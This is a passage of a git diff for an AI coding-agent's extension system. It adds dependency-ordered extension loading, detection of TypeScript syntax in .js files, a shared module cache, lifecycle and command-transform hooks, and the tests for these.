sortExtensionPaths([pathC, pathA, pathB]); + assert.deepEqual(result.sortedPaths, [pathA, pathB, pathC]); + assert.equal(result.warnings.length, 0); + }); + + it("sorts dependencies before dependents", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathBase = createExtDir(base, "base-ext"); + const pathDependent = createExtDir(base, "dependent-ext", ["base-ext"]); + + // Pass dependent first — sort should reorder + const result = sortExtensionPaths([pathDependent, pathBase]); + assert.deepEqual(result.sortedPaths, [pathBase, pathDependent]); + assert.equal(result.warnings.length, 0); + }); + + it("handles deep dependency chains", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathA = createExtDir(base, "a"); + const pathB = createExtDir(base, "b", ["a"]); + const pathC = createExtDir(base, "c", ["b"]); + + const result = sortExtensionPaths([pathC, pathB, pathA]); + assert.deepEqual(result.sortedPaths, [pathA, pathB, pathC]); + assert.equal(result.warnings.length, 0); + }); + + it("warns about missing dependencies but still loads", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathExt = createExtDir(base, "my-ext", ["nonexistent"]); + + const result = sortExtensionPaths([pathExt]); + assert.equal(result.sortedPaths.length, 1); + assert.equal(result.sortedPaths[0], pathExt); + assert.equal(result.warnings.length, 1); + assert.match(result.warnings[0].message, /nonexistent.*not installed/); + }); + + it("warns about cycles but still loads both", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathA = createExtDir(base, "cycle-a", ["cycle-b"]); + const pathB = createExtDir(base, "cycle-b", ["cycle-a"]); + + const result = sortExtensionPaths([pathA, pathB]); + assert.equal(result.sortedPaths.length, 2); + assert.ok(result.warnings.length > 0); + assert.ok(result.warnings.some((w) => w.message.includes("cycle"))); + }); + + it("silently ignores self-dependencies", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const pathExt = createExtDir(base, "self-dep", ["self-dep"]); + + const result = sortExtensionPaths([pathExt]); + assert.deepEqual(result.sortedPaths, [pathExt]); + assert.equal(result.warnings.length, 0); + }); + + it("prepends extensions without manifests", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const noManifestDir = join(base, "no-manifest"); + mkdirSync(noManifestDir, { recursive: true }); + writeFileSync(join(noManifestDir, "index.ts"), `export default function() {}`); + const noManifestPath = join(noManifestDir, "index.ts"); + + const pathWithManifest = createExtDir(base, "with-manifest"); + + const result = sortExtensionPaths([pathWithManifest, noManifestPath]); + assert.equal(result.sortedPaths[0], noManifestPath); + assert.equal(result.sortedPaths[1], pathWithManifest); + }); + + it("handles non-array dependencies gracefully", () => { + const base = mkdtempSync(join(tmpdir(), "ext-sort-")); + const dir = join(base, "bad-deps"); + mkdirSync(dir, { recursive: true }); + writeFileSync( + join(dir, "extension-manifest.json"), + JSON.stringify({ + id: "bad-deps", + name: "bad-deps", + version: "1.0.0", + tier: "bundled", + dependencies: { extensions: "not-an-array" }, + }), + ); + writeFileSync(join(dir, "index.ts"), `export default function() {}`); + + const result = sortExtensionPaths([join(dir, "index.ts")]); + assert.equal(result.sortedPaths.length, 1); + assert.equal(result.warnings.length, 0); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/extension-sort.ts b/packages/pi-coding-agent/src/core/extensions/extension-sort.ts new file mode 100644 index 000000000..07a3e67d6 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/extension-sort.ts @@ -0,0 +1,137 @@ +// GSD-2 — Extension Sort: Topological dependency ordering +// Copyright (c) 2026 Jeremy McSpadden + +import { readManifestFromEntryPath } from "./extension-manifest.js"; + +export interface SortWarning { + declaringId: string; + missingId: string; + message: string; +} + +export interface SortResult { + sortedPaths: string[]; + warnings: SortWarning[]; +} + +/** + * Sort extension entry paths in topological dependency-first order using Kahn's BFS algorithm. + * + * - Extensions without manifests are prepended in input order. + * - Missing dependencies produce a structured warning but do not block loading. + * - Cycles produce warnings; cycle participants are appended alphabetically. + * - Self-dependencies are silently ignored. + */ +export function sortExtensionPaths(paths: string[]): SortResult { + const warnings: SortWarning[] = []; + const pathsWithoutId: string[] = []; + const idToPath = new Map(); + + // Step 1: Build ID map + for (const p of paths) { + const manifest = readManifestFromEntryPath(p); + if (!manifest) { + pathsWithoutId.push(p); + } else { + idToPath.set(manifest.id, p); + } + } + + // Step 2: Build graph — inDegree and dependents adjacency + const inDegree = new Map(); + const dependents = new Map(); // dep → [ids that depend on dep] + + for (const id of idToPath.keys()) { + if (!inDegree.has(id)) inDegree.set(id, 0); + if (!dependents.has(id)) dependents.set(id, []); + } + + for (const [id, entryPath] of idToPath) { + const manifest = readManifestFromEntryPath(entryPath); + const rawDeps = manifest?.dependencies?.extensions ?? []; + const deps = Array.isArray(rawDeps) ? rawDeps : []; + + for (const depId of deps) { + // Silently ignore self-deps + if (depId === id) continue; + + if (!idToPath.has(depId)) { + // Missing dependency — warn and skip edge + warnings.push({ + declaringId: id, + missingId: depId, + message: `Extension '${id}' declares dependency '${depId}' which is not installed — loading anyway`, + }); + continue; + } + + // Valid edge: id depends on depId → increment inDegree[id], add id to dependents[depId] + inDegree.set(id, (inDegree.get(id) ?? 0) + 1); + const depDependents = dependents.get(depId) ?? []; + depDependents.push(id); + dependents.set(depId, depDependents); + } + } + + // Step 3: Kahn's algorithm — start with nodes that have inDegree 0 + const sorted: string[] = []; + // Ready queue: IDs with inDegree 0, maintained in alphabetical order + const ready: string[] = [...idToPath.keys()] + .filter((id) => inDegree.get(id) === 0) + .sort(); + + while (ready.length > 0) { + const id = ready.shift()!; + sorted.push(idToPath.get(id)!); + + const deps = dependents.get(id) ?? []; + for (const depId of deps) { + const newDegree = (inDegree.get(depId) ?? 0) - 1; + inDegree.set(depId, newDegree); + if (newDegree === 0) { + // Insert into ready queue maintaining alphabetical order + const insertIdx = ready.findIndex((r) => r > depId); + if (insertIdx === -1) { + ready.push(depId); + } else { + ready.splice(insertIdx, 0, depId); + } + } + } + } + + // Step 4: Cycle handling — any remaining IDs with inDegree > 0 + const cycleIds = [...idToPath.keys()] + .filter((id) => (inDegree.get(id) ?? 0) > 0) + .sort(); + + if (cycleIds.length > 0) { + const cycleSet = new Set(cycleIds); + + for (const id of cycleIds) { + const entryPath = idToPath.get(id)!; + const manifest = readManifestFromEntryPath(entryPath); + const rawDeps = manifest?.dependencies?.extensions ?? []; + const deps = Array.isArray(rawDeps) ? rawDeps : []; + + for (const depId of deps) { + if (depId === id) continue; + if (!cycleSet.has(depId)) continue; + + // Both id and depId are in cycle — emit warning + warnings.push({ + declaringId: id, + missingId: depId, + message: `Extension '${id}' and '${depId}' form a dependency cycle — loading both anyway (alphabetical order)`, + }); + } + + sorted.push(entryPath); + } + } + + return { + sortedPaths: [...pathsWithoutId, ...sorted], + warnings, + }; +} diff --git a/packages/pi-coding-agent/src/core/extensions/index.ts b/packages/pi-coding-agent/src/core/extensions/index.ts index 0c86d2d72..70525095a 100644 --- a/packages/pi-coding-agent/src/core/extensions/index.ts +++ b/packages/pi-coding-agent/src/core/extensions/index.ts @@ -2,6 +2,10 @@ * Extension system for lifecycle events and custom tools. */ +export type { ExtensionManifest } from "./extension-manifest.js"; +export { readManifest, readManifestFromEntryPath } from "./extension-manifest.js"; +export type { SortResult, SortWarning } from "./extension-sort.js"; +export { sortExtensionPaths } from "./extension-sort.js"; export type { SlashCommandInfo, SlashCommandLocation, SlashCommandSource } from "../slash-commands.js"; export { createExtensionRuntime, @@ -94,6 +98,11 @@ export type { // Provider Registration ProviderConfig, ProviderModelConfig, + LifecycleHookContext, + LifecycleHookHandler, + LifecycleHookMap, + LifecycleHookPhase, + LifecycleHookScope, ReadToolCallEvent, ReadToolResultEvent, // Commands @@ -141,6 +150,8 @@ export type { // Events - User Bash UserBashEvent, UserBashEventResult, + BashTransformEvent, + BashTransformEventResult, WidgetPlacement, WriteToolCallEvent, WriteToolResultEvent, diff --git a/packages/pi-coding-agent/src/core/extensions/loader.test.ts b/packages/pi-coding-agent/src/core/extensions/loader.test.ts index ef98c1189..da547e525 100644 --- a/packages/pi-coding-agent/src/core/extensions/loader.test.ts +++ b/packages/pi-coding-agent/src/core/extensions/loader.test.ts @@ -4,6 +4,7 @@ import * as fs from "node:fs"; import * as os from "node:os"; import * as path from "node:path"; import { isProjectTrusted, trustProject, getUntrustedExtensionPaths } from "./project-trust.js"; +import { containsTypeScriptSyntax, loadExtensions, resetExtensionLoaderCache } from "./loader.js"; // ─── helpers ────────────────────────────────────────────────────────────────── @@ -139,3 +140,136 @@ describe("getUntrustedExtensionPaths", () => { assert.deepEqual(result, paths); }); }); + +// ─── containsTypeScriptSyntax ───────────────────────────────────────────────── + +describe("containsTypeScriptSyntax", () => { + it("detects parameter type annotations", () => { + assert.ok(containsTypeScriptSyntax(`export default function activate(api: ExtensionAPI) {}`)); + }); + + it("detects interface declarations", () => { + assert.ok(containsTypeScriptSyntax(`interface Config { name: string; }`)); + }); + + it("detects type alias declarations", () => { + assert.ok(containsTypeScriptSyntax(`type Handler = (event: string) => void;`)); + }); + + it("detects enum declarations", () => { + assert.ok(containsTypeScriptSyntax(`enum Direction { Up, Down, Left, Right }`)); + }); + + it("detects return type annotations", () => { + assert.ok(containsTypeScriptSyntax(`function foo(): Promise {}`)); + }); + + it("detects generic type parameters on functions", () => { + assert.ok(containsTypeScriptSyntax(`function identity(arg) { return arg; }`)); + }); + + it("detects variable type annotations", () => { + assert.ok(containsTypeScriptSyntax(`const name: string = "hello";`)); + }); + + it("returns false for plain JavaScript", () => { + assert.equal(containsTypeScriptSyntax(`export default function activate(api) { api.on("init", () => {}); }`), false); + }); + + it("returns false for empty string", () => { + assert.equal(containsTypeScriptSyntax(""), false); + }); + + it("returns false for JSDoc comments with type-like syntax", () => { + // JSDoc uses different syntax: @param {string} name + assert.equal(containsTypeScriptSyntax(`/** @param {string} name */\nexport default function activate(api) {}`), false); + }); +}); + +// ─── loadExtensions: TypeScript syntax in .js files ─────────────────────────── + +describe("loadExtensions", () => { + let tmpDir: string; + + beforeEach(() => { + tmpDir = makeTempDir(); + }); + + afterEach(() => { + cleanDir(tmpDir); + }); + + it("reports helpful error when .js file contains TypeScript syntax", async () => { + // Create a .js file that uses TypeScript type annotations + const extPath = path.join(tmpDir, "my-extension.js"); + fs.writeFileSync( + extPath, + `export default function activate(api: ExtensionAPI) {\n api.on("init", async () => {});\n}\n`, + ); + + const result = await loadExtensions([extPath], tmpDir); + + assert.equal(result.errors.length, 1); + const errorMsg = result.errors[0].error; + // The error should mention TypeScript syntax and suggest .ts extension + assert.ok( + /TypeScript/.test(errorMsg) && /\.ts\b/.test(errorMsg), + `Expected error to mention TypeScript syntax and .ts extension, got: ${errorMsg}`, + ); + }); + + it("reports helpful error when .js file contains TS interface declaration", async () => { + const extPath = path.join(tmpDir, "typed-ext.js"); + fs.writeFileSync( + extPath, + `interface Config { name: string; }\nexport default function activate(api) { return; }\n`, + ); + + const result = await loadExtensions([extPath], tmpDir); + + assert.equal(result.errors.length, 1); + const errorMsg = result.errors[0].error; + assert.ok( + /TypeScript/.test(errorMsg) && /\.ts\b/.test(errorMsg), + `Expected error to mention TypeScript syntax and .ts extension, got: ${errorMsg}`, + ); + }); +}); + +// ─── resetExtensionLoaderCache ─────────────────────────────────────────────── + +describe("resetExtensionLoaderCache", () => { + let tmpDir: string; + + beforeEach(() => { + tmpDir = makeTempDir(); + // Always start with a clean cache so tests are independent + resetExtensionLoaderCache(); + }); + + afterEach(() => { + resetExtensionLoaderCache(); + cleanDir(tmpDir); + }); + + it("clears the jiti singleton so a fresh instance is created on next load", async () => { + // Write a minimal valid extension that returns a name + const extPath = path.join(tmpDir, "cache-ext.ts"); + fs.writeFileSync( + extPath, + `export default function activate(api: any) { return { name: "cache-ext" }; }\n`, + ); + + // First load — creates the jiti singleton and caches the module + const result1 = await loadExtensions([extPath], tmpDir); + assert.equal(result1.extensions.length, 1, "first load should succeed"); + + // Reset the cache — nulls the singleton + resetExtensionLoaderCache(); + + // Second load — should create a new jiti instance (not reuse the old one) + // and still successfully load the extension + const result2 = await loadExtensions([extPath], tmpDir); + assert.equal(result2.extensions.length, 1, "load after reset should succeed with fresh jiti"); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/loader.ts b/packages/pi-coding-agent/src/core/extensions/loader.ts index 88272e87b..7e25c837d 100644 --- a/packages/pi-coding-agent/src/core/extensions/loader.ts +++ b/packages/pi-coding-agent/src/core/extensions/loader.ts @@ -42,6 +42,7 @@ import type { Extension, ExtensionAPI, ExtensionFactory, + LifecycleHookHandler, ExtensionRuntime, LoadExtensionsResult, MessageRenderer, @@ -427,6 +428,8 @@ export function createExtensionRuntime(): ExtensionRuntime { unregisterProvider: (name) => { runtime.pendingProviderRegistrations = runtime.pendingProviderRegistrations.filter((r) => r.name !== name); }, + // Stub replaced by ExtensionRunner at construction time via bindEmitMethods(). + emitBeforeModelSelect: async () => undefined, }; return runtime; @@ -463,6 +466,22 @@ function createExtensionAPI( extension.commands.set(name, { name, ...options }); }, + registerBeforeInstall(handler: LifecycleHookHandler): void { + extension.lifecycleHooks.beforeInstall.push(handler); + }, + + registerAfterInstall(handler: LifecycleHookHandler): void { + extension.lifecycleHooks.afterInstall.push(handler); + }, + + registerBeforeRemove(handler: LifecycleHookHandler): void { + extension.lifecycleHooks.beforeRemove.push(handler); + }, + + registerAfterRemove(handler: LifecycleHookHandler): void { + extension.lifecycleHooks.afterRemove.push(handler); + }, + registerShortcut( shortcut: KeyId, options: { @@ -562,17 +581,102 @@ function createExtensionAPI( runtime.unregisterProvider(name); }, + async emitBeforeModelSelect(event: Omit): Promise { + return runtime.emitBeforeModelSelect(event); + }, + events: eventBus, } as ExtensionAPI; return api; } +/** + * Heuristic patterns that indicate TypeScript syntax in a source file. + * Used to detect when a .js file accidentally contains TypeScript code + * and provide a helpful error message instead of a cryptic parse failure. + */ +const TS_SYNTAX_PATTERNS: RegExp[] = [ + // Variable type annotations: const name: string, let count: number + /\b(?:const|let|var)\s+\w+\s*:\s*(?:string|number|boolean|any|void|never|unknown|object|bigint|symbol|undefined|null)\b/, + // Parameter type annotations: (api: ExtensionAPI) + /\(\s*\w+\s*:\s*[A-Z]\w*/, + // Return type annotations: ): Promise { or ): string => + /\)\s*:\s*(?:Promise|string|number|boolean|void|any|never|unknown)\b/, + // Interface declarations + /\binterface\s+[A-Z]\w*\s*(?:<[^>]*>)?\s*\{/, + // Type alias declarations + /\btype\s+[A-Z]\w*\s*(?:<[^>]*>)?\s*=/, + // Angle-bracket type assertions: value + /(?:as\s+\w+(?:<[^>]*>)?)\s*[;,)\]}]/, + // Generic type parameters on functions: function foo + /\bfunction\s+\w+\s*<[^>]+>/, + // Enum declarations + /\benum\s+[A-Z]\w*\s*\{/, +]; + +/** + * Check whether a source string likely contains TypeScript syntax. + * This is a heuristic — it may produce false positives for unusual JS, + * but is tuned to catch the most common TS-in-JS mistakes. + */ +export function containsTypeScriptSyntax(source: string): boolean { + return TS_SYNTAX_PATTERNS.some((pattern) => pattern.test(source)); +} + +/** + * Shared jiti instance for loading extension modules. + * + * Before this fix (#2108), each extension created a NEW jiti instance with + * `moduleCache: false`, causing shared dependencies (e.g. @gsd/pi-agent-core) + * to be recompiled for every extension — turning a ~3s parallel load into a + * ~15-30s serial compilation bottleneck. + * + * Using a single shared instance with `moduleCache: true` means shared modules + * are compiled once and reused across all extensions. + */ +let _extensionLoaderJiti: ReturnType | null = null; + +/** + * Reset the shared jiti singleton so the next call to getExtensionLoaderJiti() + * creates a fresh instance. This prevents memory leaks in long-running daemon + * processes (every loaded module stays cached forever) and ensures stale modules + * are not returned when extension source changes on disk. + */ +export function resetExtensionLoaderCache(): void { + _extensionLoaderJiti = null; +} + +function getExtensionLoaderJiti() { + if (!_extensionLoaderJiti) { + _extensionLoaderJiti = createJiti(import.meta.url, { + moduleCache: true, + ...getJitiOptions(), + }); + } + return _extensionLoaderJiti; +} + async function loadExtensionModule(extensionPath: string) { - const jiti = createJiti(import.meta.url, { - moduleCache: false, - ...getJitiOptions(), - }); + // Pre-compiled extension loading: if the source is .ts and a sibling .js + // file exists with matching or newer mtime, use native import() to skip + // jiti JIT compilation entirely. This is the biggest startup win for + // bundled extensions that have already been built. + if (extensionPath.endsWith(".ts")) { + const jsPath = extensionPath.replace(/\.ts$/, ".js"); + try { + const [tsStat, jsStat] = [fs.statSync(extensionPath), fs.statSync(jsPath)]; + if (jsStat.mtimeMs >= tsStat.mtimeMs) { + const module = await import(jsPath); + const factory = (module.default ?? module) as ExtensionFactory; + return typeof factory !== "function" ? undefined : factory; + } + } catch { + // .js file doesn't exist or stat failed — fall through to jiti + } + } + + const jiti = getExtensionLoaderJiti(); const module = await jiti.import(extensionPath, { default: true }); const factory = module as ExtensionFactory; @@ -632,6 +736,12 @@ function createExtension(extensionPath: string, resolvedPath: string): Extension commands: new Map(), flags: new Map(), shortcuts: new Map(), + lifecycleHooks: { + beforeInstall: [], + afterInstall: [], + beforeRemove: [], + afterRemove: [], + }, }; } @@ -654,6 +764,22 @@ async function loadExtension( return { extension: null, error: null }; } logExtensionTiming(extensionPath, Date.now() - start, "failed"); + + // Check if a .js file contains TypeScript syntax + if (resolvedPath.endsWith(".js")) { + try { + const source = fs.readFileSync(resolvedPath, "utf-8"); + if (containsTypeScriptSyntax(source)) { + return { + extension: null, + error: `Extension file "${extensionPath}" appears to contain TypeScript syntax but has a .js extension. Rename it to .ts so the loader can compile it.`, + }; + } + } catch { + // Could not read file — fall through to generic error + } + } + return { extension: null, error: `Extension does not export a valid factory function: ${extensionPath}` }; } @@ -666,6 +792,23 @@ async function loadExtension( } catch (err) { const message = err instanceof Error ? err.message : String(err); logExtensionTiming(extensionPath, Date.now() - start, "failed"); + + // Check if a .js file contains TypeScript syntax — the parse error from + // jiti/Node is often cryptic, so surface a clearer diagnostic. + if (resolvedPath.endsWith(".js")) { + try { + const source = fs.readFileSync(resolvedPath, "utf-8"); + if (containsTypeScriptSyntax(source)) { + return { + extension: null, + error: `Extension file "${extensionPath}" appears to contain TypeScript syntax but has a .js extension. Rename it to .ts so the loader can compile it.`, + }; + } + } catch { + // Could not read file — fall through to generic error + } + } + return { extension: null, error: `Failed to load extension: ${message}` }; } } @@ -834,6 +977,11 @@ function discoverExtensionsInDir(dir: string): string[] { /** * Discover and load extensions from standard locations. + * + * @deprecated Use DefaultResourceLoader.reload() instead — this function is + * not called in the GSD loading flow. Extension discovery happens through + * DefaultPackageManager.resolve() → addAutoDiscoveredResources(). Kept for + * backwards compatibility with direct pi-coding-agent consumers. */ export async function discoverAndLoadExtensions( configuredPaths: string[], diff --git a/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts b/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts new file mode 100644 index 000000000..2679feae6 --- /dev/null +++ b/packages/pi-coding-agent/src/core/extensions/provider-registration.test.ts @@ -0,0 +1,81 @@ +// GSD2 — Regression test: pendingProviderRegistrations must be flushed exactly once (#3576) +// Copyright (c) 2026 Jeremy McSpadden + +import { describe, it } from "node:test"; +import assert from "node:assert/strict"; + +/** + * This test validates that the provider preflush pattern in sdk.ts clears + * pendingProviderRegistrations after iterating, so bindCore() doesn't + * re-register the same providers. + * + * The bug: createAgentSession() iterated pendingProviderRegistrations but + * did not clear the array. Later, bindCore() replayed and registered the + * same providers again, stacking wrappers. + */ + +interface ProviderEntry { + name: string; + config: Record; +} + +interface MockRuntime { + pendingProviderRegistrations: ProviderEntry[]; +} + +describe("provider registration preflush", () => { + it("clears pending registrations after preflush so bindCore does not replay", () => { + const registered: string[] = []; + const runtime: MockRuntime = { + pendingProviderRegistrations: [ + { name: "ollama", config: { type: "ollama" } }, + { name: "custom-provider", config: { type: "custom" } }, + ], + }; + + // Simulate sdk.ts preflush (lines 220-223) + for (const { name } of runtime.pendingProviderRegistrations) { + registered.push(name); + } + // The fix: clear after preflush + runtime.pendingProviderRegistrations = []; + + // Simulate bindCore() flush (runner.ts lines 268-271) + for (const { name } of runtime.pendingProviderRegistrations) { + registered.push(name); + } + runtime.pendingProviderRegistrations = []; + + assert.deepEqual( + registered, + ["ollama", "custom-provider"], + "each provider should be registered exactly once", + ); + }); + + it("without the fix, providers are registered twice", () => { + const registered: string[] = []; + const runtime: MockRuntime = { + pendingProviderRegistrations: [ + { name: "ollama", config: { type: "ollama" } }, + ], + }; + + // Old behavior: preflush without clearing + for (const { name } of runtime.pendingProviderRegistrations) { + registered.push(name); + } + // NOT clearing — simulating the old bug + + // bindCore() replays the same queue + for (const { name } of runtime.pendingProviderRegistrations) { + registered.push(name); + } + + assert.deepEqual( + registered, + ["ollama", "ollama"], + "without clearing, providers are registered twice (demonstrating the bug)", + ); + }); +}); diff --git a/packages/pi-coding-agent/src/core/extensions/runner.test.ts b/packages/pi-coding-agent/src/core/extensions/runner.test.ts index b11ae2d9a..8a5dcca24 100644 --- a/packages/pi-coding-agent/src/core/extensions/runner.test.ts +++ b/packages/pi-coding-agent/src/core/extensions/runner.test.ts @@ -48,37 +48,37 @@ function makeThrowingExtension(eventType: string, error: Error): Extension { } describe("ExtensionRunner.emitToolCall", () => { - it("catches throwing extension handler and routes to emitError", async () => { + it("catches throwing extension handler and routes to emitError", async (t) => { const dir = mkdtempSync(join(tmpdir(), "runner-test-")); - try { - const sessionManager = SessionManager.create(dir, dir); - const authStorage = AuthStorage.create(); - const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json")); - - const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed")); - const runtime = makeMinimalRuntime(); - const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry); - - const errors: any[] = []; - runner.onError((err) => errors.push(err)); - - const event: ToolCallEvent = { - type: "tool_call", - toolCallId: "test-123", - toolName: "test_tool", - input: {}, - } as ToolCallEvent; - - const result = await runner.emitToolCall(event); - - // Should not throw — error is caught and routed to emitError - assert.equal(result, undefined); - assert.equal(errors.length, 1); - assert.equal(errors[0].error, "handler crashed"); - assert.equal(errors[0].event, "tool_call"); - assert.equal(errors[0].extensionPath, "/test/throwing-ext"); - } finally { + t.after(() => { rmSync(dir, { recursive: true, force: true }); - } + }); + + const sessionManager = SessionManager.create(dir, dir); + const authStorage = AuthStorage.create(); + const modelRegistry = new ModelRegistry(authStorage, join(dir, "models.json")); + + const throwingExt = makeThrowingExtension("tool_call", new Error("handler crashed")); + const runtime = makeMinimalRuntime(); + const runner = new ExtensionRunner([throwingExt], runtime, dir, sessionManager, modelRegistry); + + const errors: any[] = []; + runner.onError((err) => errors.push(err)); + + const event: ToolCallEvent = { + type: "tool_call", + toolCallId: "test-123", + toolName: "test_tool", + input: {}, + } as ToolCallEvent; + + const result = await runner.emitToolCall(event); + + // Should not throw — error is caught and routed to emitError + assert.equal(result, undefined); + assert.equal(errors.length, 1); + assert.equal(errors[0].error, "handler crashed"); + assert.equal(errors[0].event, "tool_call"); + assert.equal(errors[0].extensionPath, "/test/throwing-ext"); }); }); diff --git a/packages/pi-coding-agent/src/core/extensions/runner.ts b/packages/pi-coding-agent/src/core/extensions/runner.ts index cde7cfa57..048ad534c 100644 --- a/packages/pi-coding-agent/src/core/extensions/runner.ts +++ b/packages/pi-coding-agent/src/core/extensions/runner.ts @@ -13,6 +13,8 @@ import type { SessionManager } from "../session-manager.js"; import type { BeforeAgentStartEvent, BeforeAgentStartEventResult, + BeforeModelSelectEvent, + BeforeModelSelectResult, BeforeProviderRequestEvent, CompactOptions, ContextEvent, @@ -230,6 +232,8 @@ export class ExtensionRunner { this.cwd = cwd; this.sessionManager = sessionManager; this.modelRegistry = modelRegistry; + // Bind emit methods into the shared runtime so createExtensionAPI can delegate to them. + this.runtime.emitBeforeModelSelect = (event) => this.emitBeforeModelSelect(event); } bindCore(actions: ExtensionActions, contextActions: ExtensionContextActions): void { @@ -634,6 +638,24 @@ export class ExtensionRunner { return result; } + async emitBashTransform(command: string, cwd: string): Promise { + if (!this.hasHandlers("bash_transform")) return command; + + let current = command; + await this.invokeHandlers( + "bash_transform", + () => ({ type: "bash_transform" as const, command: current, cwd }), + (handlerResult) => { + const result = handlerResult as import("./types.js").BashTransformEventResult | undefined; + if (result?.command && result.command.trim()) { + current = result.command; + } + return { done: false }; // chain all handlers + }, + ); + return current; + } + async emitUserBash(event: UserBashEvent): Promise { let result: UserBashEventResult | undefined; @@ -676,6 +698,21 @@ export class ExtensionRunner { return currentPayload; } + async emitBeforeModelSelect(event: Omit): Promise { + let result: BeforeModelSelectResult | undefined; + await this.invokeHandlers("before_model_select", () => ({ + type: "before_model_select" as const, + ...event, + } satisfies BeforeModelSelectEvent), (handlerResult) => { + if (handlerResult) { + result = handlerResult as BeforeModelSelectResult; + return { done: true }; // first override wins + } + return { done: false }; + }); + return result; + } + async emitBeforeAgentStart( prompt: string, images: ImageContent[] | undefined, diff --git a/packages/pi-coding-agent/src/core/extensions/types.ts b/packages/pi-coding-agent/src/core/extensions/types.ts index 22b05a1a6..f4c153992 100644 --- a/packages/pi-coding-agent/src/core/extensions/types.ts +++ b/packages/pi-coding-agent/src/core/extensions/types.ts @@ -603,10 +603,45 @@ export interface ModelSelectEvent { source: ModelSelectSource; } +/** Fired before model selection runs capability scoring. Extensions can override the selected model. */ +export interface BeforeModelSelectEvent { + type: "before_model_select"; + unitType: string; + unitId: string; + classification: { tier: string; reason: string; downgraded: boolean }; + taskMetadata?: Record; + eligibleModels: string[]; + phaseConfig?: { primary: string; fallbacks: string[] }; +} + +/** Result from before_model_select event handler. Return { modelId } to override selection. */ +export interface BeforeModelSelectResult { + modelId: string; +} + // ============================================================================ // User Bash Events // ============================================================================ +/** + * Fired before the bash tool executes a shell command. + * Extensions can return a transformed command string. + * All registered handlers are called in order; each receives the output of the previous. + */ +export interface BashTransformEvent { + type: "bash_transform"; + /** The command string about to be executed */ + command: string; + /** Current working directory */ + cwd: string; +} + +/** Result from bash_transform event handler */ +export interface BashTransformEventResult { + /** Replacement command string. If omitted or empty, the original command is used. */ + command?: string; +} + /** Fired when user executes a bash command via ! or !! prefix */ export interface UserBashEvent { type: "user_bash"; @@ -846,6 +881,7 @@ export type ExtensionEvent = | ToolExecutionUpdateEvent | ToolExecutionEndEvent | ModelSelectEvent + | BashTransformEvent | UserBashEvent | InputEvent | ToolCallEvent @@ -949,6 +985,33 @@ export interface RegisteredCommand { handler: (args: string, ctx: ExtensionCommandContext) => Promise; } +export type LifecycleHookScope = "user" | "project"; +export type LifecycleHookPhase = "beforeInstall" | "afterInstall" | "beforeRemove" | "afterRemove"; + +export interface LifecycleHookContext { + /** Lifecycle phase currently being executed. */ + phase: LifecycleHookPhase; + /** Package source string passed to install (npm:, git:, https://, local path). */ + source: string; + /** Resolved installed package path (or resolved local path), when available for this phase. */ + installedPath?: string; + /** Where the package was installed. */ + scope: LifecycleHookScope; + /** Current working directory for the install invocation. */ + cwd: string; + /** Whether install is running in an interactive TTY. */ + interactive: boolean; + /** Info-level logging sink for install output. */ + log(message: string): void; + /** Warning-level logging sink for install output. */ + warn(message: string): void; + /** Error-level logging sink for install output. */ + error(message: string): void; +} + +export type LifecycleHookHandler = (ctx: LifecycleHookContext) => Promise | void; +export type LifecycleHookMap = Record; + // ============================================================================ // Extension API // ============================================================================ @@ -1000,10 +1063,19 @@ export interface ExtensionAPI { on(event: "tool_execution_update", handler: ExtensionHandler): void; on(event: "tool_execution_end", handler: ExtensionHandler): void; on(event: "model_select", handler: ExtensionHandler): void; + on(event: "bash_transform", handler: ExtensionHandler): void; on(event: "tool_call", handler: ExtensionHandler): void; on(event: "tool_result", handler: ExtensionHandler): void; on(event: "user_bash", handler: ExtensionHandler): void; on(event: "input", handler: ExtensionHandler): void; + on(event: "before_model_select", handler: ExtensionHandler): void; + + // ========================================================================= + // Event Emission (for host extensions that orchestrate model selection) + // ========================================================================= + + /** Emit before_model_select event. Returns override model ID or undefined. */ + emitBeforeModelSelect(event: Omit): Promise; // ========================================================================= // Tool Registration @@ -1019,6 +1091,18 @@ export interface ExtensionAPI { /** Register a custom command. */ registerCommand(name: string, options: Omit): void; + /** Register a lifecycle hook run before package installation starts. */ + registerBeforeInstall(handler: LifecycleHookHandler): void; + + /** Register a lifecycle hook run after package installation completes. */ + registerAfterInstall(handler: LifecycleHookHandler): void; + + /** Register a lifecycle hook run before package removal starts. */ + registerBeforeRemove(handler: LifecycleHookHandler): void; + + /** Register a lifecycle hook run after package removal completes. */ + registerAfterRemove(handler: LifecycleHookHandler): void; + /** Register a keyboard shortcut. */ registerShortcut( shortcut: KeyId, @@ -1201,6 +1285,11 @@ export interface ExtensionAPI { /** Configuration for registering a provider via pi.registerProvider(). */ export interface ProviderConfig { + /** Auth behavior for provider availability and request key handling. Defaults to "apiKey". */ + authMode?: "apiKey" | "oauth" | "externalCli" | "none"; + /** Optional readiness check. Return false if the provider cannot accept requests (e.g., CLI not authenticated, API key invalid). + * Called before default auth checks. Trusted at the same level as extension code — extensions already have arbitrary code execution. */ + isReady?: () => boolean; /** Base URL for the API endpoint. Required when defining models. */ baseUrl?: string; /** API key or environment variable name. Required when defining models (unless oauth provided). */ @@ -1252,6 +1341,8 @@ export interface ProviderModelConfig { headers?: Record; /** OpenAI compatibility settings. */ compat?: Model["compat"]; + /** Opaque provider-specific options (e.g. Ollama keep_alive, num_gpu). */ + providerOptions?: Record; } /** Extension factory function type. Supports both sync and async initialization. */ @@ -1302,6 +1393,8 @@ export interface ExtensionRuntimeState { */ registerProvider: (name: string, config: ProviderConfig) => void; unregisterProvider: (name: string) => void; + /** Emit before_model_select event to all registered handlers. Bound by ExtensionRunner. */ + emitBeforeModelSelect: (event: Omit) => Promise; } /** @@ -1382,6 +1475,7 @@ export interface Extension { commands: Map; flags: Map; shortcuts: Map; + lifecycleHooks: 